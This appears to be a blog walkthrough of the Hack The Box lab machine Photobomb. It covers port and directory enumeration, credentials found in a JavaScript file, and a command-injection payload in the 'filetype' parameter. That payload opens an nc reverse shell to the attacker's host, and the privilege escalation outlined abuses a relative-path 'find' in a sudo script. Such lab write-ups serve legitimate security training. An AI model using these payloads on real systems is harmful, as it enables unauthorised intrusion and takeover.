Walkthrough - Photobomb, a Hack The Box machine
About the machine
data | |
---|---|
Machine | Photobomb |
Platform | Hackthebox |
url | link |
creator | slartibartfast |
OS | Linux |
Release data | 08 October 2022 |
Difficulty | Easy |
Points | 20 |
ip | 10.10.11.182 |
Recon
For the sake of commodity, we'll create a variable:
Service/ Port enumeration
Run nmap to enumerate open ports, services, OS, and traceroute
General enumeration not to make too much noise:
Results:Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 12:34 EDT
Nmap scan report for 10.10.11.182
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We open the /etc/hosts file with an editor. For instance, nano.
We move the cursor to the end and we add these lines:Directory enumeration
We can use dirbuster to enumerate directories:
And we configure it to launch this dictionary: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txtResults:
Dirs found with a 200 response:
/
Dirs found with a 401 response:
/printer/
/printers/
/printerfriendly/
/printer_friendly/
/printer_icon/
/printer-icon/
/printer-friendly/
/printerFriendly/
/printersupplies/
/printer1/
--------------------------------
Files found during testing:
Files found with a 401 response:
/printer
/printer.php
/printers.php
/printerfriendly.php
/printer_friendly.php
/printer_icon.php
/printer-friendly.php
/printerFriendly.php
/printersupplies.php
/printer1.php
Files found with a 200 response:
/photobomb.js
As we wait, we do a dns enumeration:
DNS enumeration
Running:
And after that: Results: Then, we run: And as a result, we have: So there is no result.Exploiting the login page
At http://photobomb.htb/printer we find a login page. Use Burp to capture the request of a failed login using "username" as username and "password" as a password.
GET /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://photobomb.htb/
Upgrade-Insecure-Requests: 1
Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
After trying to brute force the login page with different seclist dictionaries, we decided to have a look at the only file with response 200 in the directory enumeration: http://photobomb.htb/photobomb.js, and bingo! The user and password are there:
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
After entering user+pass a pannel to download images is displayed. Capturing with BurpSuite this HTTP request to download an image we have:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000
Playing a little with this request in BurpSuite (module Repeater) we can infer that the site is using ruby as a programming language. Now we can play a little with the three parameters we have in the request (photo, filetype, and dimensions) and discover that for some reason filetype is injectable. We can add either a reverse shell in ruby or a reverse shell with netcat. Python doesn't work for us here. I go for an nc reverse shell and url-encode it like this:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.80+24444+>/tmp/f&dimensions=3000x2000
Now, in the attacker machine (mine is 10.10.14.80), we listen on port 24444:
Once we have the attacker machine listening, we go back to the repeater module in Burp Suite and launch the attack with the SEND button. We will obtain a reverse shell in the attacker machine.After that, we run:
to get the user flag: *****Getting the system flag
We run some basic commands:
Results: Results: Results:Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Results:
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
Two interesting things here: 1. Our user can modify environmental variables, and 2. Our user can execute /opt/cleanup.sh as root with no need for a password. Having a look at the /opt/cleanup.sh file, we can see the command "find" invoked with a relative path:
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Results:
And the flag:
Results: ******* Last update: 2023-05-02 Created: January 1, 2023 21:59:36